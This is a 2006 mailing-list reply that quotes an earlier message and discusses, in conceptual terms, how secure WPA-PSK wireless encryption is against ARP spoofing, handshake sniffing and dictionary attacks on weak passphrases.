On 6 Jun 2006, at 17:12, Spruell, Darren-Perot wrote: > My understanding is that the key shared by the WLAN nodes in WPA- > PSK is used > to generate session keys, which are then cycled on a frequent basis > (by > TKIP, if configured on WPA1) or another method that escapes me on WPA2 > (802.11i). You arp spoof and you can have traffic directed to you, > but it's > encrypted using a symmetric session key which you don't have.
This was my understanding of the situation. The traffic comes to you in encrypted form (you get it anyway as wireless is a broadcast media) but the rotating keys make it hard to crack the encryption before the key changes. I suppose you could steal a connection if you sniffed the initial handshake from the client. However, the initial password will be readily available. I'm not totally up to speed on WPA but does this make the connection more easily crackable? > The biggest weakness pointed out thusfar in WPA to my knowledge has > been in response to weak passphrases used for PSKs and dictionary > attacks against them. No fear, a "strong" password would be used, along the lines of random numbers and letters, upper and lowercase. > I would challenge that by intercepting WPA-protected traffic you > can obtain cleartext so simply. Based on what I've read, I would agree with this. I would also argue that most casual wifi crackers are lazy, and will be more likely to go for the unsecured AP down the road, rather than the guy who's using WPA/TKIP, even if it is technically crackable. This does mean that I'll need to use FreeBSD if I want to do it all in one box. Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
